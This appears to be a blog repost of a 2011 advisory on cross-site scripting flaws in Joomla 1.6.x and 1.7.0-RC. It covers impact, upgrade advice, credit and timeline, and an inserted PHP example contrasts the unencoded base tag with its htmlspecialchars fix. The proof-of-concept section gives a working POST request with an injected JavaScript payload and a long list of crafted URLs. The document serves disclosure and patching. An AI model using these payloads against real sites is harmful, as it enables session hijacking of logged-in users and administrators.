Joomla Multiple Cross Site Scripting Vulnerabilities


#Joomla Multiple Cross Site Scripting (#XSS) #Vulnerabilities

I received this notification today about a Joomla XSS vulnerability. I know some web developers and webmasters use this CMS to create web sites, so it's very important to take action to fix this vulnerability. Don't leave your CMS without fixing the problem.
Here is the summary and the steps to fix this vulnerability:

1. OVERVIEW

Joomla! 1.7.0-RC and versions of 1.6.x are vulnerable to multiple Cross Site Scripting issues.

2. BACKGROUND

Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets. It comprises a model–view–controller (MVC) Web application framework that can also be used independently.
Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization.

3. VULNERABILITY DESCRIPTION

Several parameters (searchword, Request URI) in Joomla! Core components are not properly sanitized upon submission to the /index.php URL, which allows an attacker to conduct a Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.

4. VERSION AFFECTED

1.7.0-RC and all versions of 1.6.x

5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /joomla164_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla164_noseo/
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search';onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));alert(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};//xsssssssssss&option=com_search
[/REQUEST]

XSS in Request URI
====================
File: ./includes/application.php
Line: 176, 181
Code: $document->setBase(JURI::current()); // instead of $document->setBase(htmlspecialchars(JURI::current()));

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/new-feed-categories/'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/search-component/search/'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/'">

http://localhost/joomla164/index.php/site-map/contacts/'">

http://localhost/joomla164/index.php/component/banners/click/3'">

http://localhost/joomla164/index.php/fruit-encyclopedia/'">

http://localhost/joomla164/index.php/fruit-encyclopedia/38-a'">

http://localhost/joomla164/index.php/fruit-encyclopedia/39-b'">

http://localhost/joomla164/index.php/fruit-encyclopedia/57-t'">

http://localhost/joomla164/index.php/growers/23-happy-orange-orchard'">

http://localhost/joomla164/index.php/image-gallery/animals/25-koala'">

http://localhost/joomla164/index.php/image-gallery/scenery/64-blue-mountain-rain-forest'">

http://localhost/joomla164/index.php/image-gallery/scenery/65-ormiston-pound'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/34-park-site/'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/34-park-site/2-webmaster'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/35-shop-site/'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/contact-component/contact-categories/35-shop-site/8-shop-address'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/archived-articles/9-uncategorised'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/archived-articles/9-uncategorised/'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/archived-articles/9-uncategorised/67-whats-new-in-15'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/26-park-site'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/29-fruit-shop-site'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/20-extensions'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/1-joomla-announcements'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/2-new-joomla-extensions'">

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/3-joomla-security-news'">
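The following is an added example, not Joomla's code, that models the ./includes/application.php defect from section 5 (the current URL written into the document's base tag without encoding) beside the htmlspecialchars() form the advisory gives as the fix. current_url() is a stand-in for JURI::current() written for this example, and all function names here are assumptions, not project identifiers.

```php
<?php
// Added example, not Joomla's code: models the ./includes/application.php
// defect from section 5, where JURI::current() is written into <base href>
// unencoded. current_url() is a stand-in for JURI::current() made for this
// example (an assumption; real Joomla does more), and the function names are
// not from the project.

// Request URL as a front controller sees it, built from $_SERVER-style input.
function current_url(array $server): string {
    $https = !empty($server['HTTPS']) && $server['HTTPS'] !== 'off';
    return ($https ? 'https' : 'http') . '://' . $server['HTTP_HOST'] . $server['REQUEST_URI'];
}

// Vulnerable form (advisory: lines 176, 181): raw URL inside an attribute value.
function base_tag_vulnerable(string $url): string {
    return '<base href="' . $url . '" />';
}

// Corrected form the advisory gives: encode for the HTML attribute context.
// ENT_QUOTES also encodes single quotes, so neither quote style can end the
// attribute and > cannot end the tag.
function base_tag_hardened(string $url): string {
    return '<base href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" />';
}

// Constructed request whose path ends in the '"> fragment the advisory's
// PoC URLs use.
$server = [
    'HTTP_HOST'   => 'localhost',
    'REQUEST_URI' => '/joomla164/index.php/site-map/contacts/\'">',
];
$url = current_url($server);

// In the first line the path closes the href attribute and the tag early;
// in the second the same characters are entity-encoded and stay inside
// the attribute value.
echo base_tag_vulnerable($url), PHP_EOL;
echo base_tag_hardened($url), PHP_EOL;
```

Attribute encoding is the right fix for the base tag; a value reflected inside inline script or an event-handler attribute (the shape the searchword payload above implies) also needs JavaScript string escaping, because browsers decode HTML entities in event-handler attributes before executing them.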

6. IMPACT

Attackers can compromise a currently logged-in user/administrator session and impersonate arbitrary user actions available under /administrator/ functions.

7. SOLUTION

The development of Joomla! 1.6.x has ceased; there will be no fixed version for 1.6.x. Upgrade to Joomla! 1.7.0-stable or higher.

8. VENDOR

Joomla! Developer Team http://www.joomla.org

9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

10. DISCLOSURE TIME-LINE

2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0, released
2011-07-22: vulnerability disclosed

11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.5]_cross_site_scripting(XSS)

Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
http://yehg.net/lab/#advisories.joomla

Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html

I hope this information will be useful to you.

Regards


Professional Ethical Hacker, Pentester & Forensics Investigator MPCS, CEH v8, CSSP, CICP-CICAP HTCIA Member & ISECOM Member Twitter: @victormirandamx
